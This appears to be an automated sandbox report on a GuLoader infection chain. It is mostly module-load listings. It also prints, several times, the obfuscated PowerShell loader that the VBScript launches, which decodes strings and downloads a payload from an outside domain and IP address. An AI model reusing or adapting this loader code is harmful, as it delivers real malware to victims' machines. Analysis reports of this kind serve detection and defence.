Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdb source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdbC source: powershell.exe, 00000004.00000002.2304588851.00000000070F0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: ShellExecute("PowerShell", ""cls;write 'Byggeforetagender Jenda Non", "", "", "0");

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.2307801127.000000000A152000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2959075340.0000000005192000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Protogelatose $Kernevaabnene $nonfusibility), (Fjernendes5 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Baandtlleres = [AppDomain]::CurrentDomain.GetAss
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Kasseapparatet)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Naboejendommene, $false).DefineType($Cambr
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Tetricalness)$global:Retterstedets = [System.Text.Encoding]::ASCII.GetString($Fusobacteria)$global:Makuleret=$Retterstedets.substring($Morderskers,$Horehuset)<#dissheathe Feuillage E

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs tSePmF.BNVeAtK. W ePbYCMl i eDn t');$Trepanationenllaudatory+=$Flagknappers[1];Unopportunely ($Trepanationenllaudatory);Unopportunely (toddyernes ',$,S oulPdAePrTike t,s..RH e a dCeSrTsA[B$.G.rAa mSp a,]f=S$,D.o k tPo rHa,f hGa nSd l i n.gZeEr ');$Narcotisation205=toddyernes ' $SSFo lUdBe.rUiSeOt,s ..D o,w.nmlCokadd FPiFlKe.( $LSPiPdNd eRm,b lOeFr,,,$.PCa r,dOoNnGn e.rSe nVd eO)S ';$Pardonnerende=$Flagknappers[0];Unopportunely (toddyernes 'S$MgIl o bSa lg:AF oTrAh.j uIlCs.=I(HT eJsWt - Pla tDhU $SPBaUr dHo,nBnPeSr e.n,d.ev) ');while (!$Forhjuls) {Unopportunely (toddyernes '.$mg,lJoFb,
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes Byggeforetagender Jenda Nonmetallurgically Skalatrinnets Siddembler Sokkefdders doedsstraale Filnavnene Tetricalness Traadhegnenes Ironworks76 Retterstedets juridicial intetkoen Tankesystemets48 Sideprintets Opbevaringens Hydronically Forbundsstatens Pokeransigtets Putzed Pardonnerende Rangsforskel Samariterkursernes';If (${host}.CurrentCulture) {$Bofllen++;}Function toddyernes($Experientialistic){$Larisas=$Experientialistic.Length-$Bofllen;$Stregninger='SUBsTRI';$Stregninger+='ng';For( $Trepanationen=1;$Trepanationen -lt $Larisas;$Trepanationen+=2){$Byggeforetagender+=$Experientialistic.$Stregninger.Invoke( $Trepanationen, $Bofllen);}$Byggeforetagender;}function Unopportunely($unexchangeableness){ & ($Catguts) ($unexchangeableness);}$Doktorafhandlinger=toddyernes 'HMTo z iMlVl,aM/ 5 .I0C ,( WHi n dSo w sP ,NWTS V1P0 . 0K;. ,W iHn,6S4P;. Bx 6 4.; CrDvW:,1F2T1R.K0G) GGSe cMkPoB/,2B0p1.0 0B1U0 1L F iRrBe,fSoHxS/M1A2D1A.,0s ';$Grampa=toddyernes ' UPsCe rA- AUgSe,nSt, ';$Siddembler=toddyernes 'Ahst tDp.s : /P/ cSo n,tFeEm e.g aP.Vc o,m .Dd oE/NO.umtHgKa,s s e,d ..eTmTz >,h t,tFpR: /,/ 1 0 3 .R1B9P5,.I2.3M7 .P4,3D/,OUuNtSgDa.sss,eSd . eSm z. ';$Hamskiftets=toddyernes ' >. ';$Catguts=toddyernes ' iDe x, ';$arbejdsgangene='Filnavnene';$Characterisation = toddyernes 'AeBc.hIoN %.aSp pRd,aUtUaB% \PSTcAaGb.r o s.eHl,yD. Tho.rZ A& & .eVcCh,oH BtO ';Unopportunely (toddyernes '.$Cg lAoEb a.l.:OFFl a gSkTn,a pRp.e rps,= (.c,m d H/ScS I$,C h a,rMaScktBeIr,iGs,a t iFoUn,)U ');Unopportunely (toddyernes 'b$sg l.oAbSaAl :AS.k a lBa tBr ipnPn,e.tTsT=S$NSCiRd dSe mAbPlHe r.. sSp,lCiYtG(U$ H.a mTsAk iDf t eBtIsK)S ');Unopportunely (toddyernes 'S[NN eCt.. S.e,r v,iUc e P o.i,n tBMdaCn a gKe rl].:S:SSUe cAuRrtiNt ySPSrSoRtKoFc o l ,=, U[CNue t.. SSe cSuPrTiPt.y.Pur.oRtPoUc,o l TSyAp eA]B:G: TblSs 1I2. ');$Siddembler=$Skalatrinnets[0];$Trepanationenllaudatory= (toddyernes 'C$,g lAo b a l : SLoPlNdbe r iFe tRsS= N.eOwC- ONbUj eBc t SMyAs 